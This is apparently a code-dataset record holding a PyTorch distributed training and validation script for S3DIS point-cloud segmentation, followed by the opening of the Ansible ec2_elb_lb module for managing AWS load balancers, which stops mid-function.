validate('resume', val_loader, model, criterion, runing_vote_logits, config, num_votes=2)
# tensorboard
if dist.get_rank() == 0:
summary_writer = SummaryWriter(log_dir=config.log_dir)
else:
summary_writer = None
# routine
for epoch in range(config.start_epoch, config.epochs + 1):
train_loader.sampler.set_epoch(epoch)
val_loader.sampler.set_epoch(epoch)
train_loader.dataset.epoch = epoch - 1
tic = time.time()
loss = train(epoch, train_loader, model, criterion, optimizer, scheduler, config)
logger.info('epoch {}, total time {:.2f}, lr {:.5f}'.format(epoch,
(time.time() - tic),
optimizer.param_groups[0]['lr']))
if epoch % config.val_freq == 0:
validate(epoch, val_loader, model, criterion, runing_vote_logits, config, num_votes=2)
if dist.get_rank() == 0:
# save model
save_checkpoint(config, epoch, model, optimizer, scheduler)
if summary_writer is not None:
# tensorboard logger
summary_writer.add_scalar('ins_loss', loss, epoch)
summary_writer.add_scalar('learning_rate', optimizer.param_groups[0]['lr'], epoch)
validate('Last', val_loader, model, criterion, runing_vote_logits, config, num_votes=20)
def train(epoch, train_loader, model, criterion, optimizer, scheduler, config):
"""
One epoch training
"""
model.train()
batch_time = AverageMeter()
data_time = AverageMeter()
loss_meter = AverageMeter()
end = time.time()
for idx, (points, mask, features, points_labels, cloud_label, input_inds) in enumerate(train_loader):
data_time.update(time.time() - end)
bsz = points.size(0)
# forward
points = points.cuda(non_blocking=True)
mask = mask.cuda(non_blocking=True)
features = features.cuda(non_blocking=True)
points_labels = points_labels.cuda(non_blocking=True)
if config.model_name == 'pointnet':
pred,_,transform_feature = model(points,mask, features)
loss = criterion(pred,points_labels,mask,transform_feature)
else:
pred = model(points,mask, features)
loss = criterion(pred,points_labels,mask)
optimizer.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), 10)
optimizer.step()
scheduler.step()
# update meters
loss_meter.update(loss.item(), bsz)
batch_time.update(time.time() - end)
end = time.time()
# print info
if idx % config.print_freq == 0:
logger.info(f'Train: [{epoch}/{config.epochs + 1}][{idx}/{len(train_loader)}]\t'
f'T {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
f'DT {data_time.val:.3f} ({data_time.avg:.3f})\t'
f'loss {loss_meter.val:.3f} ({loss_meter.avg:.3f})')
# logger.info(f'[{cloud_label}]: {input_inds}')
return loss_meter.avg
def validate(epoch, test_loader, model, criterion, runing_vote_logits, config, num_votes=10):
"""one epoch validating
Args:
epoch (int or str): current epoch
test_loader ([type]): [description]
model ([type]): [description]
criterion ([type]): [description]
runing_vote_logits ([type]): [description]
config ([type]): [description]
num_votes (int, optional): [description]. Defaults to 10.
Raises:
NotImplementedError: [description]
Returns:
[int]: mIoU for one epoch over the validation set
"""
vote_logits_sum = [np.zeros((config.num_classes, l.shape[0]), dtype=np.float32) for l in
test_loader.dataset.sub_clouds_points_labels]
vote_counts = [np.zeros((1, l.shape[0]), dtype=np.float32) + 1e-6 for l in
test_loader.dataset.sub_clouds_points_labels]
vote_logits = [np.zeros((config.num_classes, l.shape[0]), dtype=np.float32) for l in
test_loader.dataset.sub_clouds_points_labels]
validation_proj = test_loader.dataset.projections
validation_labels = test_loader.dataset.clouds_points_labels
test_smooth = 0.95
val_proportions = np.zeros(config.num_classes, dtype=np.float32)
for label_value in range(config.num_classes):
val_proportions[label_value] = np.sum(
[np.sum(labels == label_value) for labels in test_loader.dataset.clouds_points_labels])
batch_time = AverageMeter()
losses = AverageMeter()
model.eval()
with torch.no_grad():
end = time.time()
RT = d_utils.BatchPointcloudRandomRotate(x_range=config.x_angle_range, y_range=config.y_angle_range,
z_range=config.z_angle_range)
TS = d_utils.BatchPointcloudScaleAndJitter(scale_low=config.scale_low, scale_high=config.scale_high,
std=config.noise_std, clip=config.noise_clip,
augment_symmetries=config.augment_symmetries)
for v in range(num_votes):
test_loader.dataset.epoch = (0 + v) if isinstance(epoch, str) else (epoch + v) % 20
predictions = []
targets = []
for idx, (points, mask, features, points_labels, cloud_label, input_inds) in enumerate(test_loader):
# augment for voting
if v > 0:
points = RT(points)
points = TS(points)
if config.input_features_dim <= 5:
pass
elif config.input_features_dim == 6:
color = features[:, :3, :]
features = torch.cat([color, points.transpose(1, 2).contiguous()], 1)
elif config.input_features_dim == 7:
color_h = features[:, :4, :]
features = torch.cat([color_h, points.transpose(1, 2).contiguous()], 1)
else:
raise NotImplementedError(
f"input_features_dim {config.input_features_dim} in voting not supported")
# forward
points = points.cuda(non_blocking=True)
mask = mask.cuda(non_blocking=True)
features = features.cuda(non_blocking=True)
points_labels = points_labels.cuda(non_blocking=True)
cloud_label = cloud_label.cuda(non_blocking=True)
input_inds = input_inds.cuda(non_blocking=True)
if config.model_name == 'pointnet':
pred,_,transform_feature = model(points,mask, features)
loss = criterion(pred,points_labels,mask,transform_feature)
else:
pred = model(points,mask, features)
loss = criterion(pred,points_labels,mask)
losses.update(loss.item(), points.size(0))
# collect
bsz = points.shape[0]
for ib in range(bsz):
mask_i = mask[ib].cpu().numpy().astype(np.bool)
logits = pred[ib].cpu().numpy()[:, mask_i]
inds = input_inds[ib].cpu().numpy()[mask_i]
c_i = cloud_label[ib].item()
vote_logits_sum[c_i][:, inds] = vote_logits_sum[c_i][:, inds] + logits
vote_counts[c_i][:, inds] += 1
vote_logits[c_i] = vote_logits_sum[c_i] / vote_counts[c_i]
runing_vote_logits[c_i][:, inds] = test_smooth * runing_vote_logits[c_i][:, inds] + \
(1 - test_smooth) * logits
predictions += [logits]
targets += [test_loader.dataset.sub_clouds_points_labels[c_i][inds]]
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if idx % config.print_freq == 0:
logger.info(
f'Test: [{idx}/{len(test_loader)}]\t'
f'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
f'Loss {losses.val:.4f} ({losses.avg:.4f})')
pIoUs, pmIoU = s3dis_part_metrics(config.num_classes, predictions, targets, val_proportions)
logger.info(f'E{epoch} V{v} * part_mIoU {pmIoU:.3%}')
logger.info(f'E{epoch} V{v} * part_msIoU {pIoUs}')
runsubIoUs, runsubmIoU = sub_s3dis_metrics(config.num_classes, runing_vote_logits,
test_loader.dataset.sub_clouds_points_labels, val_proportions)
logger.info(f'E{epoch} V{v} * running sub_mIoU {runsubmIoU:.3%}')
logger.info(f'E{epoch} V{v} * running sub_msIoU {runsubIoUs}')
subIoUs, submIoU = sub_s3dis_metrics(config.num_classes, vote_logits,
test_loader.dataset.sub_clouds_points_labels, val_proportions)
logger.info(f'E{epoch} V{v} * sub_mIoU {submIoU:.3%}')
logger.info(f'E{epoch} V{v} * sub_msIoU {subIoUs}')
IoUs, mIoU = s3dis_metrics(config.num_classes, vote_logits, validation_proj, validation_labels)
logger.info(f'E{epoch} V{v} * mIoU {mIoU:.3%}')
logger.info(f'E{epoch} V{v} * msIoU {IoUs}')
return mIoU
if __name__ == "__main__":
# load config
args, config = parse_config()
torch.cuda.set_device(config.local_rank)
torch.distributed.init_process_group(backend='nccl', init_method='env://')
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
torch.backends.cudnn.deterministic = True
os.makedirs(args.log_dir, exist_ok=True)
os.environ["JOB_LOG_DIR"] = config.log_dir
logger = setup_logger(output=config.log_dir, distributed_rank=dist.get_rank(), name="s3dis")
if dist.get_rank() == 0:
path = os.path.join(config.log_dir, "config.json")
# save args and config settings to config.json
with open(path, 'w') as f:
json.dump(vars(args), f, indent=2)
json.dump(vars(config), f, indent=2)
os.system('cp %s %s' % (args.cfg, config.log_dir))
logger.info("Full config saved to {}".format(path))
# main function
main(config)
| 44.64876 | 160 | 0.617955 | import os
import sys
import time
from datetime import datetime
import json
import random
import numpy as np
import torch
import torch.nn as nn
from torchvision import transforms
import torch.distributed as dist
from torch.utils.tensorboard import SummaryWriter
from torch.nn.parallel import DistributedDataParallel
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(ROOT_DIR)
import argparse
from utils.config import config, update_config
from utils.logger import setup_logger
from models import PointNetSemSeg, PointNet2SSGSemSeg, PointNet2MSGSemSeg , get_masked_CE_loss
from datasets import S3DISSemSeg
import datasets.data_utils as d_utils
from utils.util import AverageMeter, s3dis_metrics, sub_s3dis_metrics, s3dis_part_metrics
from utils.lr_scheduler import get_scheduler
def parse_config():
parser = argparse.ArgumentParser('S3DIS semantic segmentation training')
parser.add_argument('--cfg', type=str, default='project/cfgs/s3dis/pointnet2_msg.yaml', help='config file')
parser.add_argument('--data_root', type=str, default='data', help='root director of dataset')
parser.add_argument('--num_workers', type=int, default=4, help='num of workers to use')
parser.add_argument('--batch_size', type=int, help='batch_size')
parser.add_argument('--num_points', type=int, help='num_points')
parser.add_argument('--num_steps', type=int, help='num_steps')
parser.add_argument('--base_learning_rate', type=float, help='base learning rate')
parser.add_argument('--weight_decay', type=float, help='weight_decay')
parser.add_argument('--epochs', type=int, help='number of training epochs')
parser.add_argument('--start_epoch', type=int, help='used for resume')
parser.add_argument('--load_path', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--print_freq', type=int, default=10, help='print frequency')
parser.add_argument('--save_freq', type=int, default=10, help='save frequency')
parser.add_argument('--val_freq', type=int, default=10, help='val frequency')
parser.add_argument('--log_dir', type=str, default='log', help='log dir [default: log]')
parser.add_argument("--local_rank", type=int,default=0, help='local rank for DistributedDataParallel')
parser.add_argument("--rng_seed", type=int, default=0, help='manual seed')
args, unparsed = parser.parse_known_args()
update_config(args.cfg)
config.data_root = args.data_root
config.num_workers = args.num_workers
config.load_path = args.load_path
config.print_freq = args.print_freq
config.save_freq = args.save_freq
config.val_freq = args.val_freq
config.rng_seed = args.rng_seed
config.local_rank = args.local_rank
model_name = args.cfg.split('.')[-2].split('/')[-1]
config.model_name = model_name
current_time = datetime.now().strftime('%Y%m%d%H%M%S')
config.log_dir = os.path.join(args.log_dir, 's3dis', f'{model_name}_{int(current_time)}') config.batch_size = args.batch_size
if args.num_points:
config.num_points = args.num_points
if args.num_steps:
config.num_steps = args.num_steps
if args.base_learning_rate:
config.base_learning_rate = args.base_learning_rate
if args.weight_decay:
config.weight_decay = args.weight_decay
if args.epochs:
config.epochs = args.epochs
if args.start_epoch:
config.start_epoch = args.start_epoch
print(args)
print(config)
torch.manual_seed(args.rng_seed)
torch.cuda.manual_seed_all(args.rng_seed)
random.seed(args.rng_seed)
np.random.seed(args.rng_seed)
return args, config
def get_loader(config):
train_transforms = transforms.Compose([
d_utils.PointcloudToTensor(),
d_utils.PointcloudRandomRotate(x_range=config.x_angle_range, y_range=config.y_angle_range,
z_range=config.z_angle_range),
d_utils.PointcloudScaleAndJitter(scale_low=config.scale_low, scale_high=config.scale_high,
std=config.noise_std, clip=config.noise_clip,
augment_symmetries=config.augment_symmetries),
])
test_transforms = transforms.Compose([
d_utils.PointcloudToTensor(),
])
train_dataset = S3DISSemSeg(input_features_dim=config.input_features_dim,
subsampling_parameter=config.sampleDl, color_drop=config.color_drop,
in_radius=config.in_radius, num_points=config.num_points,
num_steps=config.num_steps, num_epochs=config.epochs,
transforms=train_transforms, split='train')
val_dataset = S3DISSemSeg(input_features_dim=config.input_features_dim,
subsampling_parameter=config.sampleDl, color_drop=config.color_drop,
in_radius=config.in_radius, num_points=config.num_points,
num_steps=config.num_steps, num_epochs=20,
transforms=test_transforms, split='val')
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset, shuffle=False)
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=config.batch_size,
shuffle=False,
num_workers=config.num_workers,
pin_memory=True,
sampler=train_sampler,
drop_last=True)
val_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset, shuffle=False)
val_loader = torch.utils.data.DataLoader(val_dataset,
batch_size=config.batch_size,
shuffle=False,
num_workers=config.num_workers,
pin_memory=True,
sampler=val_sampler,
drop_last=False)
return train_loader, val_loader
def load_checkpoint(config, model, optimizer, scheduler):
logger.info("=> loading checkpoint '{}'".format(config.load_path))
checkpoint = torch.load(config.load_path, map_location='cpu')
config.start_epoch = checkpoint['epoch'] + 1
model.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
scheduler.load_state_dict(checkpoint['scheduler'])
logger.info("=> loaded successfully '{}' (epoch {})".format(config.load_path, checkpoint['epoch']))
del checkpoint
torch.cuda.empty_cache()
def save_checkpoint(config, epoch, model, optimizer, scheduler):
logger.info('==> Saving...')
state = {
'config': config,
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
'scheduler': scheduler.state_dict(),
'epoch': epoch,
}
torch.save(state, os.path.join(config.log_dir, 'current.pth'))
if epoch % config.save_freq == 0:
torch.save(state, os.path.join(config.log_dir, f'ckpt_epoch_{epoch}.pth'))
logger.info("Saved in {}".format(os.path.join(config.log_dir, f'ckpt_epoch_{epoch}.pth')))
def main(config):
train_loader, val_loader = get_loader(config)
n_data = len(train_loader.dataset)
logger.info(f"length of training dataset: {n_data}")
n_data = len(val_loader.dataset)
logger.info(f"length of validation dataset: {n_data}")
if config.model_name == 'pointnet':
model = PointNetSemSeg(config,config.input_features_dim)
elif config.model_name =='pointnet2_ssg':
model = PointNet2SSGSemSeg(config,config.input_features_dim)
elif config.model_name =='pointnet2_msg':
model = PointNet2MSGSemSeg(config,config.input_features_dim)
else:
raise NotImplementedError("error")
criterion = get_masked_CE_loss()
model.cuda()
criterion.cuda()
if config.optimizer == 'sgd':
optimizer = torch.optim.SGD(model.parameters(),
lr=config.batch_size * dist.get_world_size() / 8 * config.base_learning_rate,
momentum=config.momentum,
weight_decay=config.weight_decay)
elif config.optimizer == 'adam':
optimizer = torch.optim.Adam(model.parameters(),
lr=config.base_learning_rate,
weight_decay=config.weight_decay)
elif config.optimizer == 'adamW':
optimizer = torch.optim.AdamW(model.parameters(),
lr=config.base_learning_rate,
weight_decay=config.weight_decay)
else:
raise NotImplementedError(f"Optimizer {config.optimizer} not supported")
scheduler = get_scheduler(optimizer, len(train_loader), config)
model = DistributedDataParallel(model, device_ids=[config.local_rank], broadcast_buffers=False,find_unused_parameters=True)
runing_vote_logits = [np.zeros((config.num_classes, l.shape[0]), dtype=np.float32) for l in
val_loader.dataset.sub_clouds_points_labels]
if config.load_path:
assert os.path.isfile(config.load_path)
load_checkpoint(config, model, optimizer, scheduler)
logger.info("==> checking loaded ckpt")
validate('resume', val_loader, model, criterion, runing_vote_logits, config, num_votes=2)
if dist.get_rank() == 0:
summary_writer = SummaryWriter(log_dir=config.log_dir)
else:
summary_writer = None
for epoch in range(config.start_epoch, config.epochs + 1):
train_loader.sampler.set_epoch(epoch)
val_loader.sampler.set_epoch(epoch)
train_loader.dataset.epoch = epoch - 1
tic = time.time()
loss = train(epoch, train_loader, model, criterion, optimizer, scheduler, config)
logger.info('epoch {}, total time {:.2f}, lr {:.5f}'.format(epoch,
(time.time() - tic),
optimizer.param_groups[0]['lr']))
if epoch % config.val_freq == 0:
validate(epoch, val_loader, model, criterion, runing_vote_logits, config, num_votes=2)
if dist.get_rank() == 0:
save_checkpoint(config, epoch, model, optimizer, scheduler)
if summary_writer is not None:
summary_writer.add_scalar('ins_loss', loss, epoch)
summary_writer.add_scalar('learning_rate', optimizer.param_groups[0]['lr'], epoch)
validate('Last', val_loader, model, criterion, runing_vote_logits, config, num_votes=20)
def train(epoch, train_loader, model, criterion, optimizer, scheduler, config):
model.train()
batch_time = AverageMeter()
data_time = AverageMeter()
loss_meter = AverageMeter()
end = time.time()
for idx, (points, mask, features, points_labels, cloud_label, input_inds) in enumerate(train_loader):
data_time.update(time.time() - end)
bsz = points.size(0)
points = points.cuda(non_blocking=True)
mask = mask.cuda(non_blocking=True)
features = features.cuda(non_blocking=True)
points_labels = points_labels.cuda(non_blocking=True)
if config.model_name == 'pointnet':
pred,_,transform_feature = model(points,mask, features)
loss = criterion(pred,points_labels,mask,transform_feature)
else:
pred = model(points,mask, features)
loss = criterion(pred,points_labels,mask)
optimizer.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), 10)
optimizer.step()
scheduler.step()
loss_meter.update(loss.item(), bsz)
batch_time.update(time.time() - end)
end = time.time()
if idx % config.print_freq == 0:
logger.info(f'Train: [{epoch}/{config.epochs + 1}][{idx}/{len(train_loader)}]\t'
f'T {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
f'DT {data_time.val:.3f} ({data_time.avg:.3f})\t'
f'loss {loss_meter.val:.3f} ({loss_meter.avg:.3f})')
return loss_meter.avg
def validate(epoch, test_loader, model, criterion, runing_vote_logits, config, num_votes=10):
vote_logits_sum = [np.zeros((config.num_classes, l.shape[0]), dtype=np.float32) for l in
test_loader.dataset.sub_clouds_points_labels]
vote_counts = [np.zeros((1, l.shape[0]), dtype=np.float32) + 1e-6 for l in
test_loader.dataset.sub_clouds_points_labels]
vote_logits = [np.zeros((config.num_classes, l.shape[0]), dtype=np.float32) for l in
test_loader.dataset.sub_clouds_points_labels]
validation_proj = test_loader.dataset.projections
validation_labels = test_loader.dataset.clouds_points_labels
test_smooth = 0.95
val_proportions = np.zeros(config.num_classes, dtype=np.float32)
for label_value in range(config.num_classes):
val_proportions[label_value] = np.sum(
[np.sum(labels == label_value) for labels in test_loader.dataset.clouds_points_labels])
batch_time = AverageMeter()
losses = AverageMeter()
model.eval()
with torch.no_grad():
end = time.time()
RT = d_utils.BatchPointcloudRandomRotate(x_range=config.x_angle_range, y_range=config.y_angle_range,
z_range=config.z_angle_range)
TS = d_utils.BatchPointcloudScaleAndJitter(scale_low=config.scale_low, scale_high=config.scale_high,
std=config.noise_std, clip=config.noise_clip,
augment_symmetries=config.augment_symmetries)
for v in range(num_votes):
test_loader.dataset.epoch = (0 + v) if isinstance(epoch, str) else (epoch + v) % 20
predictions = []
targets = []
for idx, (points, mask, features, points_labels, cloud_label, input_inds) in enumerate(test_loader):
if v > 0:
points = RT(points)
points = TS(points)
if config.input_features_dim <= 5:
pass
elif config.input_features_dim == 6:
color = features[:, :3, :]
features = torch.cat([color, points.transpose(1, 2).contiguous()], 1)
elif config.input_features_dim == 7:
color_h = features[:, :4, :]
features = torch.cat([color_h, points.transpose(1, 2).contiguous()], 1)
else:
raise NotImplementedError(
f"input_features_dim {config.input_features_dim} in voting not supported")
points = points.cuda(non_blocking=True)
mask = mask.cuda(non_blocking=True)
features = features.cuda(non_blocking=True)
points_labels = points_labels.cuda(non_blocking=True)
cloud_label = cloud_label.cuda(non_blocking=True)
input_inds = input_inds.cuda(non_blocking=True)
if config.model_name == 'pointnet':
pred,_,transform_feature = model(points,mask, features)
loss = criterion(pred,points_labels,mask,transform_feature)
else:
pred = model(points,mask, features)
loss = criterion(pred,points_labels,mask)
losses.update(loss.item(), points.size(0))
bsz = points.shape[0]
for ib in range(bsz):
mask_i = mask[ib].cpu().numpy().astype(np.bool)
logits = pred[ib].cpu().numpy()[:, mask_i]
inds = input_inds[ib].cpu().numpy()[mask_i]
c_i = cloud_label[ib].item()
vote_logits_sum[c_i][:, inds] = vote_logits_sum[c_i][:, inds] + logits
vote_counts[c_i][:, inds] += 1
vote_logits[c_i] = vote_logits_sum[c_i] / vote_counts[c_i]
runing_vote_logits[c_i][:, inds] = test_smooth * runing_vote_logits[c_i][:, inds] + \
(1 - test_smooth) * logits
predictions += [logits]
targets += [test_loader.dataset.sub_clouds_points_labels[c_i][inds]]
batch_time.update(time.time() - end)
end = time.time()
if idx % config.print_freq == 0:
logger.info(
f'Test: [{idx}/{len(test_loader)}]\t'
f'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
f'Loss {losses.val:.4f} ({losses.avg:.4f})')
pIoUs, pmIoU = s3dis_part_metrics(config.num_classes, predictions, targets, val_proportions)
logger.info(f'E{epoch} V{v} * part_mIoU {pmIoU:.3%}')
logger.info(f'E{epoch} V{v} * part_msIoU {pIoUs}')
runsubIoUs, runsubmIoU = sub_s3dis_metrics(config.num_classes, runing_vote_logits,
test_loader.dataset.sub_clouds_points_labels, val_proportions)
logger.info(f'E{epoch} V{v} * running sub_mIoU {runsubmIoU:.3%}')
logger.info(f'E{epoch} V{v} * running sub_msIoU {runsubIoUs}')
subIoUs, submIoU = sub_s3dis_metrics(config.num_classes, vote_logits,
test_loader.dataset.sub_clouds_points_labels, val_proportions)
logger.info(f'E{epoch} V{v} * sub_mIoU {submIoU:.3%}')
logger.info(f'E{epoch} V{v} * sub_msIoU {subIoUs}')
IoUs, mIoU = s3dis_metrics(config.num_classes, vote_logits, validation_proj, validation_labels)
logger.info(f'E{epoch} V{v} * mIoU {mIoU:.3%}')
logger.info(f'E{epoch} V{v} * msIoU {IoUs}')
return mIoU
if __name__ == "__main__":
args, config = parse_config()
torch.cuda.set_device(config.local_rank)
torch.distributed.init_process_group(backend='nccl', init_method='env://')
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
torch.backends.cudnn.deterministic = True
os.makedirs(args.log_dir, exist_ok=True)
os.environ["JOB_LOG_DIR"] = config.log_dir
logger = setup_logger(output=config.log_dir, distributed_rank=dist.get_rank(), name="s3dis")
if dist.get_rank() == 0:
path = os.path.join(config.log_dir, "config.json")
with open(path, 'w') as f:
json.dump(vars(args), f, indent=2)
json.dump(vars(config), f, indent=2)
os.system('cp %s %s' % (args.cfg, config.log_dir))
logger.info("Full config saved to {}".format(path))
main(config)
| true | true |
1c3c8d34fbb6e1c16f04f4c9f1b01e65a09d95d8 | 53,065 | py | Python | Ansible-AWS-Provisioning/collections/ansible_collections/amazon/aws/plugins/modules/ec2_elb_lb.py | ginigangadharan/ansible-real-life | 897c2fc0d05babbb540768b336b6ad399dad5bfa | [
"MIT"
] | 22 | 2021-07-16T08:11:22.000Z | 2022-03-31T07:15:34.000Z | Ansible-AWS-Provisioning/collections/ansible_collections/amazon/aws/plugins/modules/ec2_elb_lb.py | premsagar0228/ansible-real-life | 1a51193b833ab6ad320100472333b9ffb0da39d4 | [
"MIT"
] | null | null | null | Ansible-AWS-Provisioning/collections/ansible_collections/amazon/aws/plugins/modules/ec2_elb_lb.py | premsagar0228/ansible-real-life | 1a51193b833ab6ad320100472333b9ffb0da39d4 | [
"MIT"
] | 39 | 2021-07-05T02:31:42.000Z | 2022-03-31T02:46:03.000Z | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: ec2_elb_lb
version_added: 1.0.0
description:
- Returns information about the load balancer.
- Will be marked changed when called only if state is changed.
short_description: Creates, updates or destroys an Amazon ELB.
author:
- "Jim Dalton (@jsdalton)"
options:
state:
description:
- Create or destroy the ELB.
type: str
choices: [ absent, present ]
required: true
name:
description:
- The name of the ELB.
type: str
required: true
listeners:
description:
- List of ports/protocols for this ELB to listen on (see examples).
type: list
elements: dict
purge_listeners:
description:
- Purge existing listeners on ELB that are not found in listeners.
type: bool
default: yes
instance_ids:
description:
- List of instance ids to attach to this ELB.
type: list
elements: str
purge_instance_ids:
description:
- Purge existing instance ids on ELB that are not found in instance_ids.
type: bool
default: no
zones:
description:
- List of availability zones to enable on this ELB.
type: list
elements: str
purge_zones:
description:
- Purge existing availability zones on ELB that are not found in zones.
type: bool
default: no
security_group_ids:
description:
- A list of security groups to apply to the ELB.
type: list
elements: str
security_group_names:
description:
- A list of security group names to apply to the ELB.
type: list
elements: str
health_check:
description:
- An associative array of health check configuration settings (see examples).
type: dict
access_logs:
description:
- An associative array of access logs configuration settings (see examples).
type: dict
subnets:
description:
- A list of VPC subnets to use when creating ELB. Zones should be empty if using this.
type: list
elements: str
purge_subnets:
description:
- Purge existing subnet on ELB that are not found in subnets.
type: bool
default: no
scheme:
description:
- The scheme to use when creating the ELB. For a private VPC-visible ELB use C(internal).
- If you choose to update your scheme with a different value the ELB will be destroyed and
recreated. To update scheme you must use the option I(wait).
type: str
choices: ["internal", "internet-facing"]
default: 'internet-facing'
connection_draining_timeout:
description:
- Wait a specified timeout allowing connections to drain before terminating an instance.
type: int
idle_timeout:
description:
- ELB connections from clients and to servers are timed out after this amount of time.
type: int
cross_az_load_balancing:
description:
- Distribute load across all configured Availability Zones.
- Defaults to C(false).
type: bool
stickiness:
description:
- An associative array of stickiness policy settings. Policy will be applied to all listeners (see examples).
type: dict
wait:
description:
- When specified, Ansible will check the status of the load balancer to ensure it has been successfully
removed from AWS.
type: bool
default: no
wait_timeout:
description:
- Used in conjunction with wait. Number of seconds to wait for the ELB to be terminated.
- A maximum of 600 seconds (10 minutes) is allowed.
type: int
default: 60
tags:
description:
- An associative array of tags. To delete all tags, supply an empty dict (C({})).
type: dict
extends_documentation_fragment:
- amazon.aws.aws
- amazon.aws.ec2
requirements:
- python >= 2.6
- boto
'''
EXAMPLES = """
# Note: None of these examples set aws_access_key, aws_secret_key, or region.
# It is assumed that their matching environment variables are set.
# Basic provisioning example (non-VPC)
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http # options are http, https, ssl, tcp
load_balancer_port: 80
instance_port: 80
proxy_protocol: True
- protocol: https
load_balancer_port: 443
instance_protocol: http # optional, defaults to value of protocol setting
instance_port: 80
# ssl certificate required for https or ssl
ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/company/servercerts/ProdServerCert"
# Internal ELB example
- amazon.aws.ec2_elb_lb:
name: "test-vpc"
scheme: internal
state: present
instance_ids:
- i-abcd1234
purge_instance_ids: true
subnets:
- subnet-abcd1234
- subnet-1a2b3c4d
listeners:
- protocol: http # options are http, https, ssl, tcp
load_balancer_port: 80
instance_port: 80
# Configure a health check and the access logs
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
health_check:
ping_protocol: http # options are http, https, ssl, tcp
ping_port: 80
ping_path: "/index.html" # not required for tcp or ssl
response_timeout: 5 # seconds
interval: 30 # seconds
unhealthy_threshold: 2
healthy_threshold: 10
access_logs:
interval: 5 # minutes (defaults to 60)
s3_location: "my-bucket" # This value is required if access_logs is set
s3_prefix: "logs"
# Ensure ELB is gone
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: absent
# Ensure ELB is gone and wait for check (for default timeout)
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: absent
wait: yes
# Ensure ELB is gone and wait for check with timeout value
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: absent
wait: yes
wait_timeout: 600
# Normally, this module will purge any listeners that exist on the ELB
# but aren't specified in the listeners parameter. If purge_listeners is
# false it leaves them alone
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
purge_listeners: no
# Normally, this module will leave availability zones that are enabled
# on the ELB alone. If purge_zones is true, then any extraneous zones
# will be removed
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
purge_zones: yes
# Creates a ELB and assigns a list of subnets to it.
- amazon.aws.ec2_elb_lb:
state: present
name: 'New ELB'
security_group_ids: 'sg-123456, sg-67890'
region: us-west-2
subnets: 'subnet-123456,subnet-67890'
purge_subnets: yes
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
# Create an ELB with connection draining, increased idle timeout and cross availability
# zone load balancing
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
connection_draining_timeout: 60
idle_timeout: 300
cross_az_load_balancing: "yes"
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
# Create an ELB with load balancer stickiness enabled
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
stickiness:
type: loadbalancer
enabled: yes
expiration: 300
# Create an ELB with application stickiness enabled
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
stickiness:
type: application
enabled: yes
cookie: SESSIONID
# Create an ELB and add tags
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
tags:
Name: "New ELB"
stack: "production"
client: "Bob"
# Delete all tags from an ELB
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
tags: {}
"""
import random
import time
try:
import boto
import boto.ec2.elb
import boto.ec2.elb.attributes
import boto.vpc
from boto.ec2.elb.healthcheck import HealthCheck
from boto.ec2.tag import Tag
except ImportError:
pass # Taken care of by ec2.HAS_BOTO
from ansible.module_utils.six import string_types
from ansible.module_utils._text import to_native
from ..module_utils.core import AnsibleAWSModule
from ..module_utils.ec2 import AnsibleAWSError
from ..module_utils.ec2 import HAS_BOTO
from ..module_utils.ec2 import connect_to_aws
from ..module_utils.ec2 import get_aws_connection_info
def _throttleable_operation(max_retries):
def _operation_wrapper(op):
def _do_op(*args, **kwargs):
retry = 0
while True:
try:
return op(*args, **kwargs)
except boto.exception.BotoServerError as e:
if retry < max_retries and e.code in \
("Throttling", "RequestLimitExceeded"):
retry = retry + 1
time.sleep(min(random.random() * (2 ** retry), 300))
continue
else:
raise
return _do_op
return _operation_wrapper
def _get_vpc_connection(module, region, aws_connect_params):
try:
return connect_to_aws(boto.vpc, region, **aws_connect_params)
